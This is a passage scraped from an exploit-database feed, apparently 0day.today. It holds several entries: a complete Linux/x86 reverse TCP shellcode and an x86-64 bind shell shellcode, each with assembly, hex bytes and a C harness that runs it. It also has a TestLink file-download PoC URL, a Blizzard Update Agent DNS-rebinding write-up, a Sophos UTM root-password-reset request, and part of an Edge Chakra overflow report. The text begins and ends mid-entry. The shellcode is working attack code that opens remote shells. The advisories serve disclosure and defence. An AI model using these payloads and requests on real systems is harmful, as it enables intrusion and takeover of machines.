\r\nint main(int argc, char **argv)\r\n{\r\nprintf(\"Shellcode Length: %d\\n\", strlen(code));\r\nint (*ret)() = (int(*)())code;\r\nret();\r\n}\r\n \r\n \r\n \r\n-- \r\n$ cd /pub\r\n$ more beer\r\n \r\nI pirati della sicurezza applicativa: https://codiceinsicuro.it\n\n# 0day.today [2018-06-01] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/30511"}, {"lastseen": "2018-05-15T02:35:38", "bulletinFamily": "exploit", "description": "Exploit for linux/x86 platform in category shellcode", "modified": "2018-05-14T00:00:00", "published": "2018-05-14T00:00:00", "id": "1337DAY-ID-30347", "href": "https://0day.today/exploit/description/30347", "title": "Linux/x86 - Reverse TCP (127.0.0.1:4444/TCP) #Shell #Shellcode (96 Bytes)", "type": "zdt", "sourceData": "/*\r\n; Title: Linux/x86 - TCP reverse shell\r\n; Author: Paolo Perego <[email\u00a0protected]>\r\n; Website: https://codiceinsicuro.it\r\n; Blog post:\r\nhttps://codiceinsicuro.it/slae/assignment-2-create-a-reverse-shellcode/\r\n; Twitter: @thesp0nge\r\n; SLAE-ID: 1217\r\n; Purpose: connect to a given IP and PORT and spawning a reverse shell if\r\n; connection succeded\r\n \r\n \r\nglobal _start\r\n \r\nsection .text\r\n \r\n_start:\r\n \r\n; Creating the socket.\r\n;\r\n; int socket(int domain, int type, int protocol);\r\n;\r\n; socket() is defined as #define __NR_socket 359 on\r\n/usr/include/i386-linux-gnu/asm/unistd_32.h\r\n; AF_INET is defined as 2 in /usr/include/i386-linux-gnu/bits/socket.h\r\n; SOCK_STREAM is defined as 1 in\r\n/usr/include/i386-linux-gnu/bits/socket_type.h\r\nxor eax, eax\r\nxor ebx, ebx\r\nxor ecx, ecx\r\nxor edx, edx\r\n \r\nmov ax, 0x167\r\nmov bl, 0x2\r\nmov cl, 0x1\r\nint 0x80 ; sfd = socket(AF_INET, SOCK_STREAM, 0);\r\nmov ebx, eax ; storing the socket descriptor into EBX for next syscall\r\n \r\n; Connect to my peer\r\n;\r\n; connect() is defined as #define __NR_connect 362 on\r\n/usr/include/i386-linux-gnu/asm/unistd_32.h\r\n; peer.sin_family = AF_INET;\r\n; peer.sin_port = htons(DPORT);\r\n; peer.sin_addr.s_addr = inet_addr(IP);\r\n; ret = connect(sfd, (const struct sockaddr *)&peer, sizeof(struct\r\nsockaddr_in));\r\n \r\n; 127 = 0x7f\r\n; 0 = 0x0\r\n; 0 = 0x0\r\n; 1 = 0x1\r\n \r\n; push 0x0100007f\r\nmov eax, 0xfeffff80\r\nxor eax, 0xffffffff\r\npush eax\r\npush word 0x5c11 ; port 4444 is 0x5c11\r\npush word 0x2 ; AF_INET is 2\r\n \r\nmov ecx, esp\r\nmov dl, 0x10 ; sizeof(struct sockaddr_in)\r\nxor eax, eax\r\nmov ax, 0x16a\r\nint 0x80\r\n \r\ntest eax, eax ; check if eax is zero\r\njnz exit_on_error\r\n \r\n; Duplicating descriptor 0, 1, 2 to the socket opened by client\r\n;\r\n; int dup2(int oldfd, int newfd);\r\n;\r\n; dup2 is defined as #define __NR_dup2 63 in\r\n/usr/include/i386-linux-gnu/asm/unistd_32.h\r\n \r\nxor ecx, ecx\r\nmov cl, 2\r\nxor eax, eax\r\n \r\ndup2:\r\nmov al, 0x3F ; 63 in decimal\r\nint 0x80 ; duplicating file descriptors in backwards order; from 2 to 0\r\ndec ecx\r\njns dup2\r\n \r\n; Executing shell\r\n;\r\n; int execve(const char *filename, char *const argv[], char *const envp[]);\r\n; execve() is defined as #define __NR_execve 11 on\r\n/usr/include/i386-linux-gnu/asm/unistd_32.h\r\n \r\nxor eax, eax\r\npush eax ; The NULL byte\r\npush 0x68732f2f ; \"sh//\". The second '\\' is used to align our command into\r\nthe stack\r\npush 0x6e69622f ; \"nib/\"\r\nmov ebx, esp ; EBX now points to \"/bin//sh\"\r\nxor ecx, ecx\r\nxor edx, edx\r\nmov al, 0xB ; 11 in decimal\r\nint 0x80\r\n \r\nexit_on_error:\r\nmov bl, 0x1\r\nxor eax, eax ; zero-ing EAX\r\nmov al, 0x1\r\nint 0x80\r\n*/\r\n#include<stdio.h>\r\n#include<string.h>\r\n \r\nunsigned char code[] = \\\r\n\"\\x31\\xc0\\x31\\xdb\\x31\\xc9\\x31\\xd2\\x66\\xb8\\x67\\x01\\xb3\\x02\\xb1\\x01\\xcd\\x80\\x89\\xc3\\xb8\\x80\\xff\\xff\\xfe\\x83\\xf0\\xff\\x50\\x66\\x68\\x11\\x5c\\x66\\x6a\\x02\\x89\\xe1\\xb2\\x10\\x31\\xc0\\x66\\xb8\\x6a\\x01\\xcd\\x80\\x85\\xc0\\x75\\x24\\x31\\xc9\\xb1\\x02\\x31\\xc0\\xb0\\x3f\\xcd\\x80\\x49\\x79\\xf9\\x31\\xc0\\x50\\x68\\x2f\\x2f\\x73\\x68\\x68\\x2f\\x62\\x69\\x6e\\x89\\xe3\\x31\\xc9\\x31\\xd2\\xb0\\x0b\\xcd\\x80\\xb3\\x01\\x31\\xc0\\xb0\\x01\\xcd\\x80\";\r\n \r\n \r\nint main(int argc, char **argv)\r\n{\r\nprintf(\"Shellcode Length: %d\\n\", strlen(code));\r\nint (*ret)() = (int(*)())code;\r\nret();\r\n}\n\n# 0day.today [2018-05-15] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/30347"}, {"lastseen": "2018-04-09T17:38:37", "bulletinFamily": "exploit", "description": "Exploit for php platform in category web applications", "modified": "2018-02-28T00:00:00", "published": "2018-02-28T00:00:00", "href": "https://0day.today/exploit/description/29906", "id": "1337DAY-ID-29906", "title": "TestLink Open Source Test Management Insecure Direct Object Reference Vulnerability", "type": "zdt", "sourceData": "=======================================================================\r\n title: Insecure Direct Object Reference\r\n product: TestLink Open Source Test Management\r\n vulnerable version: <1.9.17\r\n fixed version: 1.9.17 (after November 2017), and the current\r\n \"testlink_1_9\" branch\r\n CVE number: -\r\n impact: Medium\r\n homepage: http://testlink.org/\r\n found: 2017-09-22\r\n by: T. Weber (Office Vienna)\r\n SEC Consult Vulnerability Lab\r\n\r\n An integrated part of SEC Consult\r\n Bangkok - Berlin - Linz - Luxembourg - Montreal\r\n Moscow - Munich - Kuala Lumpur - Singapore\r\n Vienna (HQ) - Vilnius - Zurich\r\n\r\n https://www.sec-consult.com\r\n\r\n=======================================================================\r\n\r\nVendor description:\r\n-------------------\r\n\"TestLink is a web based test management and test execution system.\r\nIt enables quality assurance teams to create and manage their test\r\ncases as well as to organize them into test plans. These test plans\r\nallow team members to execute test cases and track test results\r\ndynamically.\"\r\n\r\nSource: https://github.com/TestLinkOpenSourceTRMS/testlink-code\r\n\r\n\r\nBusiness recommendation:\r\n------------------------\r\nSEC Consult advises to immediately install the available updates as attackers\r\nmight gain access to sensitive data belonging to other users.\r\n\r\nA thorough security review performed by security professionals is highly\r\nrecommended in order to identify potential further security deficiencies.\r\n\r\n\r\nVulnerability overview/description:\r\n-----------------------------------\r\n1) Insecure Direct Object Reference\r\nAn unauthenticated user can gain access to referenced files which are produced by\r\ndifferent test cases. By using a simple ID iterator, all produced output\r\ndata can be gathered from the whole system.\r\n\r\nThe actual impact strongly depends on the classification of the produced data\r\nwhich is referenced. Therefore, the risk can vary from low to critical\r\ndepending on the use case.\r\n\r\n\r\nProof of concept:\r\n-----------------\r\n1) Insecure Direct Object Reference\r\nAn unauthenticated attacker can download data from the TestLink environment\r\nby using the following url:\r\nhttp://<IP-Address>/lib/attachments/attachmentdownload.php?skipCheck=1&id=<ID>\r\n\r\nThe tag <IP-Address> specifies the target address and can also include a sub-\r\nfolder where the hosted TestLink application is located.\r\n\r\n\r\nVulnerable / tested versions:\r\n-----------------------------\r\nThe following versions have been tested and are vulnerable. It is assumed that\r\nolder versions are affected as well, e.g.:\r\n* 1.9.16\r\n* 1.9.15\r\n* 1.9.14\r\n\r\n\r\nVendor contact timeline:\r\n------------------------\r\n2017-10-18: Contacting vendor through http://mantis.testlink.org\r\n Vendor requested the information.\r\n2017-10-19: Asked if the advisory should be uploaded to mantis directly.\r\n2017-10-21: Contact agreed.\r\n2017-10-23: Uploaded the advisory to mantis.\r\n2017-11-01: Contact provided a fix for 1.9.16. Fixes will be created for\r\n 1.9.15 and 1.9.14 too. Vendor asked us for verification.\r\n2017-11-07: Stated that verification is not possible at the moment (no test\r\n instance) and that it can be verified easily with the PoC\r\n2018-01-09: Asked for status update; No answer.\r\n2018-01-29: Asked for status update; No answer.\r\n2018-02-16: Asked for status update.\r\n2018-02-17: Vendor responded that we can re-check the fix or release the\r\n advisory.\r\n2018-02-19: Asked the vendor for reachable test-instance, reply: there is\r\n no test instance\r\n2018-02-28: Public release of security advisory\r\n\r\n\r\nSolution:\r\n---------\r\nCheck-out the current testlink-code on branch \"testlink_1_9\":\r\nhttps://github.com/TestLinkOpenSourceTRMS/testlink-code/tree/testlink_1_9/\r\n\r\nThe following commit contains the fix since 2017-11-01:\r\nhttps://github.com/TestLinkOpenSourceTRMS/testlink-code/commit/d5ffdb7634e43ba352e9567333682b6436cfb43d\r\n\r\nUpgrade to 1.9.17 (after November 2017).\r\n\r\n\r\nWorkaround:\r\n-----------\r\nRestrict network access and do not expose the TestLink interface to the\r\ninternet.\n\n# 0day.today [2018-04-09] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/29906"}, {"lastseen": "2018-03-28T11:22:25", "bulletinFamily": "exploit", "description": "Exploit for windows platform in category local exploits", "modified": "2018-01-25T00:00:00", "published": "2018-01-25T00:00:00", "href": "https://0day.today/exploit/description/29629", "id": "1337DAY-ID-29629", "type": "zdt", "title": "Blizzard Update Agent - JSON RPC DNS Rebinding Vulnerability", "sourceData": "All blizzard games are installed alongside a shared tool called \"Blizzard Update Agent\", investor.activision.com claims they have \"500 million monthly active users\", who presumably all have this utility installed.\r\n \r\nThe agent utility creates an JSON RPC server listening on localhost port 1120, and accepts commands to install, uninstall, change settings, update and other maintenance related options. Blizzard use a custom authentication scheme to verify the rpc's are from a legitimate source, it looks like this:\r\n \r\n$ curl -si http://localhost:1120/agent\r\nHTTP/1.0 200 OK\r\nContent-Length: 359\r\n \r\n{\r\n \"pid\" : 3140.000000,\r\n \"user_id\" : \"S-1-5-21-1613814707-140385463-2225822625-1000\",\r\n \"user_name\" : \"S-1-5-21-1613814707-140385463-2225822625-1000\",\r\n \"state\" : 1004.000000,\r\n \"version\" : \"2.13.4.5955\",\r\n \"region\" : \"us\",\r\n \"type\" : \"retail\",\r\n \"opt_in_feedback\" : true,\r\n \"session\" : \"15409717072196133548\",\r\n \"authorization\" : \"11A87920224BD1FB22AF5F868CA0E789\"\r\n}\r\n \r\nThis endpoint is permitted without authentication, but all other requests must have a valid \"Authorization\" header with the token in that response. As with all HTTP RPC schemes like this, a website can send requests to the daemon with XMLHttpRequest(), but I think the theory is they will be ignored because requests must prove they can read and write the authorization property.\r\n \r\nI don't think this design will work because of an attack called \"dns rebinding\". Any website can simply create a dns name that they are authorized to communicate with, and then make it resolve to localhost.\r\n \r\nTo be clear, this means that *any* website can send privileged commands to the agent.\r\n \r\nI have a domain I use for testing called rbndr.us, you can use this page to generate hostnames:\r\n \r\nhttps://lock.cmpxchg8b.com/rebinder.html\r\n \r\nHere I want to alternate between 127.0.0.1 and 199.241.29.227, so I use 7f000001.c7f11de3.rbndr.us:\r\n \r\n$ host 7f000001.c7f11de3.rbndr.us\r\n7f000001.c7f11de3.rbndr.us has address 127.0.0.1\r\n$ host 7f000001.c7f11de3.rbndr.us\r\n7f000001.c7f11de3.rbndr.us has address 199.241.29.227\r\n$ host 7f000001.c7f11de3.rbndr.us\r\n7f000001.c7f11de3.rbndr.us has address 127.0.0.1\r\n \r\nHere you can see the resolution alternates between the two addresses I want (note that depending on caching it might take a while to switch, the TTL is set to minimum but some servers round up).\r\n \r\nI just wait for the cached response to expire, and then POST commands to the server.\r\n \r\nExploitation would involve using network drives, or setting destination to \"Downloads\" and making the browser install dlls, datafiles, etc.\r\n \r\nI made a very simple demo, I'm sure it's quite brittle, but hopefully you get the idea!\r\n \r\nhttp://lock.cmpxchg8b.com/yah4od7N.html\r\n \r\nSee screenshot attached of how it's supposed to look.\r\n \r\nDownload: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/43665.zip\n\n# 0day.today [2018-03-28] #", "sourceHref": "https://0day.today/exploit/29629", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-03-13T23:23:28", "bulletinFamily": "exploit", "description": "Exploit for linux/x86-64 platform in category shellcode", "modified": "2018-01-15T00:00:00", "published": "2018-01-15T00:00:00", "href": "https://0day.today/exploit/description/29512", "id": "1337DAY-ID-29512", "title": "Linux/x86-64 - Bind TCP (31337/TCP) Shell Shellcode (150 bytes)", "type": "zdt", "sourceData": "/*\r\nTitle : tcpbindshell (150 bytes)\r\nDate : 04 October 2013\r\nAuthor : Russell Willis <[email\u00a0protected]>\r\nTestd on: Linux/x86_64 (SMP Debian 3.2.46-1+deb7u1 x86_64 GNU/Linux)\r\n \r\n$ objdump -D tcpbindshell -M intel\r\ntcpbindshell: file format elf64-x86-64\r\nDisassembly of section .text:\r\n \r\n0000000000400080 <_start>:\r\n 400080: 48 31 c0 xor rax,rax\r\n 400083: 48 31 ff xor rdi,rdi\r\n 400086: 48 31 f6 xor rsi,rsi\r\n 400089: 48 31 d2 xor rdx,rdx\r\n 40008c: 4d 31 c0 xor r8,r8\r\n 40008f: 6a 02 push 0x2\r\n 400091: 5f pop rdi\r\n 400092: 6a 01 push 0x1\r\n 400094: 5e pop rsi\r\n 400095: 6a 06 push 0x6\r\n 400097: 5a pop rdx\r\n 400098: 6a 29 push 0x29\r\n 40009a: 58 pop rax\r\n 40009b: 0f 05 syscall \r\n 40009d: 49 89 c0 mov r8,rax\r\n 4000a0: 4d 31 d2 xor r10,r10\r\n 4000a3: 41 52 push r10\r\n 4000a5: 41 52 push r10\r\n 4000a7: c6 04 24 02 mov BYTE PTR [rsp],0x2\r\n 4000ab: 66 c7 44 24 02 7a 69 mov WORD PTR [rsp+0x2],0x697a\r\n 4000b2: 48 89 e6 mov rsi,rsp\r\n 4000b5: 41 50 push r8\r\n 4000b7: 5f pop rdi\r\n 4000b8: 6a 10 push 0x10\r\n 4000ba: 5a pop rdx\r\n 4000bb: 6a 31 push 0x31\r\n 4000bd: 58 pop rax\r\n 4000be: 0f 05 syscall \r\n 4000c0: 41 50 push r8\r\n 4000c2: 5f pop rdi\r\n 4000c3: 6a 01 push 0x1\r\n 4000c5: 5e pop rsi\r\n 4000c6: 6a 32 push 0x32\r\n 4000c8: 58 pop rax\r\n 4000c9: 0f 05 syscall \r\n 4000cb: 48 89 e6 mov rsi,rsp\r\n 4000ce: 48 31 c9 xor rcx,rcx\r\n 4000d1: b1 10 mov cl,0x10\r\n 4000d3: 51 push rcx\r\n 4000d4: 48 89 e2 mov rdx,rsp\r\n 4000d7: 41 50 push r8\r\n 4000d9: 5f pop rdi\r\n 4000da: 6a 2b push 0x2b\r\n 4000dc: 58 pop rax\r\n 4000dd: 0f 05 syscall \r\n 4000df: 59 pop rcx\r\n 4000e0: 4d 31 c9 xor r9,r9\r\n 4000e3: 49 89 c1 mov r9,rax\r\n 4000e6: 4c 89 cf mov rdi,r9\r\n 4000e9: 48 31 f6 xor rsi,rsi\r\n 4000ec: 6a 03 push 0x3\r\n 4000ee: 5e pop rsi\r\n00000000004000ef <doop>:\r\n 4000ef: 48 ff ce dec rsi\r\n 4000f2: 6a 21 push 0x21\r\n 4000f4: 58 pop rax\r\n 4000f5: 0f 05 syscall \r\n 4000f7: 75 f6 jne 4000ef <doop>\r\n 4000f9: 48 31 ff xor rdi,rdi\r\n 4000fc: 57 push rdi\r\n 4000fd: 57 push rdi\r\n 4000fe: 5e pop rsi\r\n 4000ff: 5a pop rdx\r\n 400100: 48 bf 2f 2f 62 69 6e movabs rdi,0x68732f6e69622f2f\r\n 400107: 2f 73 68 \r\n 40010a: 48 c1 ef 08 shr rdi,0x8\r\n 40010e: 57 push rdi\r\n 40010f: 54 push rsp\r\n 400110: 5f pop rdi\r\n 400111: 6a 3b push 0x3b\r\n 400113: 58 pop rax\r\n 400114: 0f 05 syscall \r\n \r\n Code not is not optimal, this is left as an exercise to the reader ;^)\r\n \r\n*/\r\n \r\n#include <stdio.h>\r\n \r\n#define PORT \"\\x7a\\x69\" /* 31337 */\r\n \r\nunsigned char code[] = \\\r\n\"\\x48\\x31\\xc0\\x48\\x31\\xff\\x48\\x31\\xf6\\x48\\x31\\xd2\\x4d\\x31\\xc0\\x6a\"\r\n\"\\x02\\x5f\\x6a\\x01\\x5e\\x6a\\x06\\x5a\\x6a\\x29\\x58\\x0f\\x05\\x49\\x89\\xc0\"\r\n\"\\x4d\\x31\\xd2\\x41\\x52\\x41\\x52\\xc6\\x04\\x24\\x02\\x66\\xc7\\x44\\x24\\x02\"\r\nPORT\"\\x48\\x89\\xe6\\x41\\x50\\x5f\\x6a\\x10\\x5a\\x6a\\x31\\x58\\x0f\\x05\"\r\n\"\\x41\\x50\\x5f\\x6a\\x01\\x5e\\x6a\\x32\\x58\\x0f\\x05\\x48\\x89\\xe6\\x48\\x31\"\r\n\"\\xc9\\xb1\\x10\\x51\\x48\\x89\\xe2\\x41\\x50\\x5f\\x6a\\x2b\\x58\\x0f\\x05\\x59\"\r\n\"\\x4d\\x31\\xc9\\x49\\x89\\xc1\\x4c\\x89\\xcf\\x48\\x31\\xf6\\x6a\\x03\\x5e\\x48\"\r\n\"\\xff\\xce\\x6a\\x21\\x58\\x0f\\x05\\x75\\xf6\\x48\\x31\\xff\\x57\\x57\\x5e\\x5a\"\r\n\"\\x48\\xbf\\x2f\\x2f\\x62\\x69\\x6e\\x2f\\x73\\x68\\x48\\xc1\\xef\\x08\\x57\\x54\"\r\n\"\\x5f\\x6a\\x3b\\x58\\x0f\\x05\";\r\n \r\nint\r\nmain(void)\r\n{\r\n printf(\"Shellcode Length: %d\\n\", (int)sizeof(code)-1);\r\n int (*ret)() = (int(*)())code;\r\n ret();\r\n return 0;\r\n}\n\n# 0day.today [2018-03-13] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/29512"}, {"lastseen": "2018-03-14T09:20:18", "bulletinFamily": "exploit", "description": "Exploit for hardware platform in category remote exploits", "modified": "2017-10-25T00:00:00", "published": "2017-10-25T00:00:00", "href": "https://0day.today/exploit/description/28869", "id": "1337DAY-ID-28869", "title": "Sophos UTM 9 loginuser Privilege Escalation Via Insecure Directory Permissions Vulnerability", "type": "zdt", "sourceData": "Title: Sophos UTM 9 loginuser Privilege Escalation via Insecure Directory Permissions\r\nAdvisory ID: KL-001-2017-020\r\nPublication Date: 2017.10.24\r\nPublication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2017-020.txt\r\n\r\n\r\n1. Vulnerability Details\r\n\r\n Affected Vendor: Sophos\r\n Affected Product: UTM 9\r\n Affected Version: 9.410\r\n Platform: Embedded Linux\r\n CWE Classification: CWE-280: Improper Handling of Insufficient\r\n Permissions or Privileges\r\n Impact: Root Access\r\n Attack vector: SSH\r\n\r\n2. Vulnerability Description\r\n\r\n The attacker must know the password for the loginuser\r\n account. The confd client is not available to the loginuser\r\n account. However, it is possible to list a directory containing\r\n a sub-directories whose names are valid session identifiers\r\n (SID) and can be used to make requests on behalf of other\r\n accounts, such as admin. This allows for escalation to root\r\n privilege.\r\n\r\n3. Technical Description\r\n\r\n 1. Obtain the a privileged session token\r\n\r\n $ ssh [email\u00a0protected]\r\n [email\u00a0protected]'s password:\r\n\r\n Sophos UTM\r\n (C) Copyright 2000-2016 Sophos Limited and others. All rights reserved.\r\n Sophos is a registered trademark of Sophos Limited and Sophos Group.\r\n All other product and company names mentioned are trademarks or registered\r\n trademarks of their respective owners.\r\n\r\n For more copyright information look at /doc/astaro-license.txt\r\n or http://www.astaro.com/doc/astaro-license.txt\r\n\r\n NOTE: If not explicitly approved by Sophos support, any modifications\r\n done by root will void your support.\r\n\r\n [email\u00a0protected][redacted]:/home/login > cd /var/confd/var/sessions/\r\n [email\u00a0protected][redacted]:/var/confd/var/sessions > ls -la\r\n total 40\r\n drwxr-xr-x 2 root root 4096 Mar 23 14:53 .\r\n drwxr-xr-x 5 root root 4096 Mar 19 16:06 ..\r\n -rw-r--r-- 1 root root 359 Mar 23 14:47 qpmNEByQxJGYYWTvRyVC\r\n -rw-r--r-- 1 root root 5 Mar 23 14:47 qpmNEByQxJGYYWTvRyVC.lock\r\n -rw-r--r-- 1 root root 369 Mar 23 14:52 SxAIqVdVmexIEdQYHvHk\r\n -rw-r--r-- 1 root root 35 Mar 23 14:52 SxAIqVdVmexIEdQYHvHk.lock\r\n -rw-r--r-- 1 root root 367 Mar 23 14:47 VbYBGlcwaLVDnzEuFCwP\r\n -rw-r--r-- 1 root root 10 Mar 23 14:47 VbYBGlcwaLVDnzEuFCwP.lock\r\n -rw-r--r-- 1 root root 370 Mar 23 14:47 xZzeOIhVClqKYsmCKHrN\r\n -rw-r--r-- 1 root root 5 Mar 23 14:47 xZzeOIhVClqKYsmCKHrN.lock\r\n\r\n 2. Set the root password\r\n\r\n POST /webadmin.plx HTTP/1.1\r\n Host: 1.3.3.7:4444\r\n User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:52.0) Gecko/20100101 Firefox/52.0\r\n Accept: text/javascript, text/html, application/xml, text/xml, */*\r\n Accept-Language: en-US,en;q=0.5\r\n X-Requested-With: XMLHttpRequest\r\n X-Prototype-Version: 1.5.1.1\r\n Content-Type: application/json; charset=UTF-8\r\n Referer: https://1.3.3.7:4444/\r\n Content-Length: 418\r\n Cookie: SID=xZzeOIhVClqKYsmCKHrN\r\n DNT: 1\r\n Connection: close\r\n\r\n {\"objs\": [{\"ack\": null, \"elements\": {\"root_pw_1\": \"newroot\", \"root_pw_2\": \"newroot\", \"loginuser_pw_1\": \"loginuser\",\r\n\"loginuser_pw_2\": \"loginuser\"}, \"FID\": \"system_settings_shell\"}], \"SID\": \"xZzeOIhVClqKYsmCKHrN\", \"browser\": \"gecko\",\r\n\"backend_version\": \"2\", \"loc\": \"english\", \"_cookie\": null, \"wdebug\": 0, \"RID\": \"1490305723111_0.8089407793028881\",\r\n\"current_uuid\": \"2844879a-e014-11da-b3ae-0014221e9eba\", \"ipv6\": false}\r\n\r\n HTTP/1.1 200 OK\r\n Date: Thu, 23 Mar 2017 14:57:19 GMT\r\n Server: Apache\r\n Expires: Thursday, 01-Jan-1970 00:00:01 GMT\r\n Pragma: no-cache\r\n X-Frame-Options: SAMEORIGIN\r\n X-Content-Type-Option: nosniff\r\n X-XSS-Protection: 1; mode=block\r\n Vary: Accept-Encoding\r\n Connection: close\r\n Content-Type: application/json; charset=utf-8\r\n Content-Length: 24690\r\n\r\n {\"SID\":\"xZzeOIhVClqKYsmCKHrN\",\"ipv6\":false,\"current_uuid\":\"2844879a-e014-11da-b3ae-0014221e9eba\",\"browser\":\"gecko\",\"RID\":\"1490305723111_0.8089407793028881\",\"js\":\"cache_update();if($(\\\"topbar_icon\\\")){$(\\\"topbar_icon\\\").src=\\\"core/img/topbar/topbar_user.png\\\";}toggle_who_is_watching(0);\",\"backend_version\":\"2\",\"loc\":\"english\",\"globals_data\":[\"xZzeOIhVClqKYsmCKHrN\",\"5\",[]],\"globals\":[\"SID\",\"backend_version\",\"backend_objects_update\"],\"objs\":[{\"success\":[{\"text\":\"Shell user password(s) set successfully.\"}],\"current_uuid\":\"2844879a-e014-11da-b3ae-0014221e9eba\",\r\n [snip]\r\n \"_cookie\":null,\"wdebug\":0}\r\n\r\n 3. Look for success message.\r\n\r\n \"objs\":[{\"success\":[{\"text\":\"Shell user password(s) set successfully.\"}]\r\n\r\n 4. Profit.\r\n\r\n [email\u00a0protected][redacted]:/home/login > su\r\n Password:\r\n [redacted]:/home/login # id\r\n uid=0(root) gid=0(root) groups=0(root),890(xorp)\r\n\r\n4. Mitigation and Remediation Recommendation\r\n\r\n The vendor has addressed this vulnerability in version\r\n 9.503. Release notes and download instructions can be found at:\r\n https://community.sophos.com/products/unified-threat-management/b/utm-blog/posts/utm-up2date-9-503-released\r\n\r\n5. Credit\r\n\r\n This vulnerability was discovered by Matt Bergin (@thatguylevel)\r\n of KoreLogic, Inc.\r\n\r\n6. Disclosure Timeline\r\n\r\n 2017.07.21 - KoreLogic submits vulnerability details to Sophos.\r\n 2017.07.21 - Sophos acknowledges receipt.\r\n 2017.09.01 - 30 business days have elapsed since the vulnerability\r\n was reported to Sophos.\r\n 2017.09.15 - KoreLogic requests an update on the status of this and\r\n other vulnerabilities reported to Sophos.\r\n 2017.09.18 - Sophos informs KoreLogic that this issue has been\r\n remediated in release 9.503 for UTM.\r\n 2017.10.24 - KoreLogic public disclosure.\r\n\r\n7. Proof of Concept\r\n\r\n See 3. Technical Description.\r\n\r\n\r\nThe contents of this advisory are copyright(c) 2017\r\nKoreLogic, Inc. and are licensed under a Creative Commons\r\nAttribution Share-Alike 4.0 (United States) License:\r\nhttp://creativecommons.org/licenses/by-sa/4.0/\r\n\r\nKoreLogic, Inc. is a founder-owned and operated company with a\r\nproven track record of providing security services to entities\r\nranging from Fortune 500 to small and mid-sized companies. We\r\nare a highly skilled team of senior security consultants doing\r\nby-hand security assessments for the most important networks in\r\nthe U.S. and around the world. We are also developers of various\r\ntools and resources aimed at helping the security community.\r\nhttps://www.korelogic.com/about-korelogic.html\r\n\r\nOur public vulnerability disclosure policy is available at:\r\nhttps://www.korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v2.2.txt\n\n# 0day.today [2018-03-14] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/28869"}, {"lastseen": "2018-03-13T23:14:50", "bulletinFamily": "exploit", "description": "Exploit for windows platform in category dos / poc", "modified": "2017-08-18T00:00:00", "published": "2017-08-18T00:00:00", "href": "https://0day.today/exploit/description/28299", "id": "1337DAY-ID-28299", "title": "Microsoft Edge Chakra - Buffer Overflow Exploit", "type": "zdt", "sourceData": "<!--\r\nReport by Huang Anwen, He Xiaoxiao of ichunqiu Ker Team\r\n \r\nThere is an overflow when constructoring a new object with arguments which has 0xffff elements in Chakra!\r\nThis issue can be reproduced steadly in uptodate Edge in Win10 WIP.\r\n \r\n//ChakraCore-master\\lib\\Runtime\\ByteCode\\ByteCodeEmitter.cpp\r\nvoid EmitNew(ParseNode* pnode, ByteCodeGenerator* byteCodeGenerator, FuncInfo* funcInfo)\r\n{\r\n Js::ArgSlot argCount = pnode->sxCall.argCount; //pnode->sxCall.argCount=0xFFFF\r\n argCount++; // include \"this\" //overflow!!!! argCount==0\r\n \r\n BOOL fSideEffectArgs = FALSE;\r\n unsigned int tmpCount = CountArguments(pnode->sxCall.pnodeArgs, &fSideEffectArgs);\r\n Assert(argCount == tmpCount);\r\n \r\n if (argCount != (Js::ArgSlot)argCount)\r\n {\r\n Js::Throw::OutOfMemory();\r\n }\r\n \r\n byteCodeGenerator->StartStatement(pnode);\r\n \r\n // Start call, allocate out param space\r\n funcInfo->StartRecordingOutArgs(argCount);\r\n \r\n // Assign the call target operand(s), putting them into expression temps if necessary to protect\r\n // them from side-effects.\r\n if (fSideEffectArgs)\r\n {\r\n SaveOpndValue(pnode->sxCall.pnodeTarget, funcInfo);\r\n }\r\n \r\n if (pnode->sxCall.pnodeTarget->nop == knopSuper)\r\n {\r\n EmitSuperFieldPatch(funcInfo, pnode, byteCodeGenerator);\r\n }\r\n \r\n Emit(pnode->sxCall.pnodeTarget, byteCodeGenerator, funcInfo, false, true);\r\n \r\n if (pnode->sxCall.pnodeArgs == nullptr)\r\n {\r\n funcInfo->ReleaseLoc(pnode->sxCall.pnodeTarget);\r\n Js::OpCode op = (CreateNativeArrays(byteCodeGenerator, funcInfo)\r\n && CallTargetIsArray(pnode->sxCall.pnodeTarget))\r\n ? Js::OpCode::NewScObjArray : Js::OpCode::NewScObject;\r\n Assert(argCount == 1);\r\n \r\n Js::ProfileId callSiteId = byteCodeGenerator->GetNextCallSiteId(op);\r\n byteCodeGenerator->Writer()->StartCall(Js::OpCode::StartCall, argCount);\r\n byteCodeGenerator->Writer()->CallI(op, funcInfo->AcquireLoc(pnode),\r\n pnode->sxCall.pnodeTarget->location, argCount, callSiteId);\r\n }\r\n else\r\n {\r\n byteCodeGenerator->Writer()->StartCall(Js::OpCode::StartCall, argCount);\r\n uint32 actualArgCount = 0;\r\n \r\n if (IsCallOfConstants(pnode))\r\n {\r\n funcInfo->ReleaseLoc(pnode->sxCall.pnodeTarget);\r\n actualArgCount = EmitNewObjectOfConstants(pnode, byteCodeGenerator, funcInfo, argCount);\r\n }\r\n else\r\n {\r\n Js::OpCode op;\r\n if ((CreateNativeArrays(byteCodeGenerator, funcInfo) && CallTargetIsArray(pnode->sxCall.pnodeTarget)))\r\n {\r\n op = pnode->sxCall.spreadArgCount > 0 ? Js::OpCode::NewScObjArraySpread : Js::OpCode::NewScObjArray;\r\n }\r\n else\r\n {\r\n op = pnode->sxCall.spreadArgCount > 0 ? Js::OpCode::NewScObjectSpread : Js::OpCode::NewScObject;\r\n }\r\n \r\n Js::ProfileId callSiteId = byteCodeGenerator->GetNextCallSiteId(op);\r\n \r\n \r\n Js::AuxArray<uint32> *spreadIndices = nullptr;\r\n actualArgCount = EmitArgList(pnode->sxCall.pnodeArgs, Js::Constants::NoRegister, Js::Constants::NoRegister, Js::Constants::NoRegister,\r\n false, true, byteCodeGenerator, funcInfo, callSiteId, pnode->sxCall.spreadArgCount, &spreadIndices);\r\n 